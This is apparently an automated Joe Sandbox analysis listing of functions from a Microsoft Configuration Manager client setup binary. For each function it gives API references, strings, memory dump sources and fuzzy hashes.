                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583091
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058309D
                                                                                          • ccmsetup.cpp, xrefs: 00583081
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0058308C
                                                                                          • CcmUtilLib::CcmAppendDPAuthTokenToHeaders( L"", szDPAuthToken, &csHeaders), xrefs: 00583087
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CcmUtilLib::CcmAppendDPAuthTokenToHeaders( L"", szDPAuthToken, &csHeaders)$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3720741107
                                                                                          • Opcode ID: 103e639bd6baa1b820e47ec98387a6965f6eef457a7da5a696aa719d3f5ef506
                                                                                          • Instruction ID: 45927c91fca7f85852aed1bfb9b2b8c793d46bc915bd9c46bb6047529268e675
                                                                                          • Opcode Fuzzy Hash: 103e639bd6baa1b820e47ec98387a6965f6eef457a7da5a696aa719d3f5ef506
                                                                                          • Instruction Fuzzy Hash: 17E08CB0A8435AE9DB11BF208C2AEEE3FA57B25B09F0448C1B946791C2CBB40689D745
                                                                                          Function 005830D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 19threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005830FB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$ccmsetup.cpp$ccmsetup.cpp$dpTokenHr
                                                                                          • API String ID: 2882836952-1058242789
                                                                                          • Opcode ID: 089c65be65fdd5787cdff6ecb1dc42f03d517a0c8514a301731cc19da3105f55
                                                                                          • Instruction ID: 456493fccbec0a5feb83686b45d54c5fdf700bb2e6ce9cc6c358bbf1ef9b2af1
                                                                                          • Opcode Fuzzy Hash: 089c65be65fdd5787cdff6ecb1dc42f03d517a0c8514a301731cc19da3105f55
                                                                                          • Instruction Fuzzy Hash: 46E04FB0A84364F9DB10BB10DD1AEFD3E6A6B25B04F044485B905792C297B54B858715
                                                                                          Function 0058E35D Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 12threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058E376
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$WaitForRunning()$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-3082747322
                                                                                          • Opcode ID: 2589318dec63ead888907bfe9bfa8e7fd926b3aa3e9c899dbd5be82b42020d15
                                                                                          • Instruction ID: 92e0fd308ec9af612e2adc3a45233376667ce2b6b4d2603338bc9eacb4fae521
                                                                                          • Opcode Fuzzy Hash: 2589318dec63ead888907bfe9bfa8e7fd926b3aa3e9c899dbd5be82b42020d15
                                                                                          • Instruction Fuzzy Hash: 47C012616C43407E9E400B505E4BC212A7E9A66F113170462B510D98E081895226A632
                                                                                          Function 005790B2 Relevance: 7.8, APIs: 5, Instructions: 267COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0059D61A: __EH_prolog3.LIBCMT ref: 0059D621
                                                                                            • Part of subcall function 0059D61A: lstrcmpiW.KERNEL32(?,00000000,00579140,?,?,?,4B3A7248,?,?,?,?,?,0067E354,000000FF), ref: 0059D698
                                                                                          • CharNextW.USER32(?), ref: 0057920A
                                                                                          • CharNextW.USER32(00000000), ref: 00579227
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CharNext$H_prolog3lstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 1581910369-0
                                                                                          • Opcode ID: 9368d0a8f36f9bd8921903ad9c1c33391f9ac4c18a4088716361b68ece3cb74b
                                                                                          • Instruction ID: 31b27c2b975872d250f2ceaac0373f69d5c33910c3f72819bfd244efe64d49d1
                                                                                          • Opcode Fuzzy Hash: 9368d0a8f36f9bd8921903ad9c1c33391f9ac4c18a4088716361b68ece3cb74b
                                                                                          • Instruction Fuzzy Hash: 58B19F71900229DBDF25DF64DC499EDBBB5FB68310F1181EAE609A3290D7305E91EFA0
                                                                                          Function 005B32A2 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetAclInformation.ADVAPI32(?,005B1C78,0000000C,00000002,00000000,?,?,005B1C78,?,00000000), ref: 005B32CD
                                                                                          • GetLastError.KERNEL32(?,005B1C78,?,00000000), ref: 005B32D7
                                                                                          • GetLastError.KERNEL32(?,?,005B1C78,?,00000000), ref: 005B333A
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$Information
                                                                                          • String ID:
                                                                                          • API String ID: 3506653738-0
                                                                                          • Opcode ID: 0ab65b860cc49679447a7a1ec0496c2a86157dbbd82036c8021be91349fa7ebf
                                                                                          • Instruction ID: 6eea62877dfabdb7c6687a7ddf02ea1cb266684d7f19c69e6f3c0f3d7cb26a02
                                                                                          • Opcode Fuzzy Hash: 0ab65b860cc49679447a7a1ec0496c2a86157dbbd82036c8021be91349fa7ebf
                                                                                          • Instruction Fuzzy Hash: CE118E35600215ABEB14DF698C49BBFBBECFB48711F50452AB846E6180EA21EE01C7B0
                                                                                          Function 005FE32A Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 99COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005FE331
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F5277: __wcsnicmp.LIBCMT ref: 005F52A3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch___wcsnicmp
                                                                                          • String ID: CCM::Utility::UpdateProtocolInUrl$http://$https://
                                                                                          • API String ID: 3398957935-1259313752
                                                                                          • Opcode ID: 3b64cf6f1b12ef6cdf6c8ae9ac1481993959f64f62618b135f03a2d9e5bd83f8
                                                                                          • Instruction ID: 49ed1b4cdaedeeca13905f8c95b13b8c242fed06b4a8633961da7f2d2431e8a3
                                                                                          • Opcode Fuzzy Hash: 3b64cf6f1b12ef6cdf6c8ae9ac1481993959f64f62618b135f03a2d9e5bd83f8
                                                                                          • Instruction Fuzzy Hash: 6E31E460B4021EEADF14E6A8DC4FFFE6E65BF90700F148025F741A71D2DBAC590497A1
                                                                                          Function 00600105 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0060010C
                                                                                            • Part of subcall function 006092A8: __EH_prolog3.LIBCMT ref: 006092AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3H_prolog3_catch
                                                                                          • String ID: Successfully unloaded WMI Provider %s - %s$Unload$UnloadProvider
                                                                                          • API String ID: 1882928916-1074518252
                                                                                          • Opcode ID: d42b2ba30e346e2e9bc702470fc139f3192326b14340a775bdce4e1521cbb02a
                                                                                          • Instruction ID: c17282c64d1cef72fc3cf43231b9aec49ea0dc93db77eaab6b3554710bdc0fdf
                                                                                          • Opcode Fuzzy Hash: d42b2ba30e346e2e9bc702470fc139f3192326b14340a775bdce4e1521cbb02a
                                                                                          • Instruction Fuzzy Hash: 0131B371941249EFEB19DFD8C849ADEBBB5BF05304F148099E4446B282C7719B08CBA1
                                                                                          Function 0062036A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00620371
                                                                                          • lstrlenW.KERNEL32(00000000,CcmUtilLib::SplitAtQueryString,00000000,000000FF,00000000,000000FF,00000014,00587120,?,?,?), ref: 006203B0
                                                                                          • lstrlenW.KERNEL32(00000000,00000000,00000000), ref: 00620404
                                                                                          Strings
                                                                                          • CcmUtilLib::SplitAtQueryString, xrefs: 00620391
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrlen$H_prolog3_catch
                                                                                          • String ID: CcmUtilLib::SplitAtQueryString
                                                                                          • API String ID: 3519426085-1588836211
                                                                                          • Opcode ID: bd31fc5844791f6f39db5f1dff7d8942a9b5c951bc86fd5366d4823f536864fb
                                                                                          • Instruction ID: 400db4b5431a5517e59c8eab2d0d2e86242bd55c56ffdc75b80aaf5b14b5a4d9
                                                                                          • Opcode Fuzzy Hash: bd31fc5844791f6f39db5f1dff7d8942a9b5c951bc86fd5366d4823f536864fb
                                                                                          • Instruction Fuzzy Hash: 9921F830901A2BEBEB15FF58DC59ABEBA7ABF40310F108219B611972D3CB745D01CB90
                                                                                          Function 0061C314 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0061C31B
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          Strings
                                                                                          • Software\Microsoft\CCM, xrefs: 0061C358
                                                                                          • CcmUtilLib::GetCcmDataUsageThresholdPercent, xrefs: 0061C339
                                                                                          • DataUsageThresholdPercent, xrefs: 0061C385
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: CcmUtilLib::GetCcmDataUsageThresholdPercent$DataUsageThresholdPercent$Software\Microsoft\CCM
                                                                                          • API String ID: 543541842-2748923075
                                                                                          • Opcode ID: 2a898c84a051836ba43ad057f438361fa63f505d4c4ee039c9432dedd61eec8b
                                                                                          • Instruction ID: 33646fb1ba30692b7d46df12bcf9e7cfc9155a57e11bbf8c3738f62cc37b44fd
                                                                                          • Opcode Fuzzy Hash: 2a898c84a051836ba43ad057f438361fa63f505d4c4ee039c9432dedd61eec8b
                                                                                          • Instruction Fuzzy Hash: CF11BE71E8035ADAEB01E7A88916BEDBBB56F14714F18804AF650B72C2C7B80F44D791
                                                                                          Function 005B81FA Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 005B8201
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          Strings
                                                                                          • 9.99.9999.9999, xrefs: 005B8266
                                                                                          • Installed Version, xrefs: 005B8255
                                                                                          • SOFTWARE\Microsoft\SMS\Client\Client Components\SMS Client Base Components\Installation Properties, xrefs: 005B823B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$CloseH_prolog3_
                                                                                          • String ID: 9.99.9999.9999$Installed Version$SOFTWARE\Microsoft\SMS\Client\Client Components\SMS Client Base Components\Installation Properties
                                                                                          • API String ID: 111660669-3738090429
                                                                                          • Opcode ID: dda034cb404b88b3965a42b54dc1dd89ab241e6862cbd644fdd6a2078a133bee
                                                                                          • Instruction ID: 8b6c09a1cb82f5a515dd96793f3037813efb32bf2838fb20fc770edb45054a72
                                                                                          • Opcode Fuzzy Hash: dda034cb404b88b3965a42b54dc1dd89ab241e6862cbd644fdd6a2078a133bee
                                                                                          • Instruction Fuzzy Hash: 7E11E538A0061DEBDF14EAA4DC96DFDFE28BF64744F00152DFA06A6181EB70AE04C761
                                                                                          Function 006262A9 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006262B0
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmUseCachedURLsOnly, xrefs: 006262BD
                                                                                          • UseCachedURLsOnly, xrefs: 006262DF
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 006262E4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: CcmUtilLib::CcmUseCachedURLsOnly$Software\Microsoft\CCM\Security$UseCachedURLsOnly
                                                                                          • API String ID: 4040336050-1421294037
                                                                                          • Opcode ID: 3167814f4fb006e2cb3ea6b8b43f17b2d411062def88e51ffbd8367cc6557d15
                                                                                          • Instruction ID: 68f4df5dd81e76d6e87ecc5766e108a4c02fe477ca8a0c0f8bc91f669a81cfa0
                                                                                          • Opcode Fuzzy Hash: 3167814f4fb006e2cb3ea6b8b43f17b2d411062def88e51ffbd8367cc6557d15
                                                                                          • Instruction Fuzzy Hash: 4801A271E45796DACB01EBF884067EDBEB55F10710F14405AB850A7282C7784B09CBE1
                                                                                          Function 006250D3 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006250DA
                                                                                            • Part of subcall function 0061F559: __EH_prolog3_catch.LIBCMT ref: 0061F560
                                                                                            • Part of subcall function 0061F559: GetCurrentThreadId.KERNEL32 ref: 0061F5BB
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmIgnoreSelfSignCheckInNativeMode, xrefs: 006250E7
                                                                                          • AllowSelfSignedNativeModeCertificate, xrefs: 00625103
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625108
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: AllowSelfSignedNativeModeCertificate$CcmUtilLib::CcmIgnoreSelfSignCheckInNativeMode$Software\Microsoft\CCM\Security
                                                                                          • API String ID: 4040336050-3196369311
                                                                                          • Opcode ID: fe82f25c9907cfe5fe8ac331c9268286e72c7ac33f03e405ac71891791c749a2
                                                                                          • Instruction ID: 1e6f54cb9cb54a17cffae7a4354565a80f1c8984b3997a530198e96804864996
                                                                                          • Opcode Fuzzy Hash: fe82f25c9907cfe5fe8ac331c9268286e72c7ac33f03e405ac71891791c749a2
                                                                                          • Instruction Fuzzy Hash: E5014972E8179ACBCB11DBF8841A7ED7E716F21310F04404AB511A7381C7784B04CF91
                                                                                          Function 00625048 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0062504F
                                                                                            • Part of subcall function 0061F862: __EH_prolog3_catch_GS.LIBCMT ref: 0061F869
                                                                                            • Part of subcall function 0061F862: GetCurrentThreadId.KERNEL32 ref: 0061F8CE
                                                                                          Strings
                                                                                          • CcmUtilLib::CcmGetTransportCertificateSelectionCriteria, xrefs: 00625058
                                                                                          • Software\Microsoft\CCM\Security, xrefs: 00625078
                                                                                          • Transport Certificate Selection Criteria, xrefs: 00625073
                                                                                          Memory Dump Source
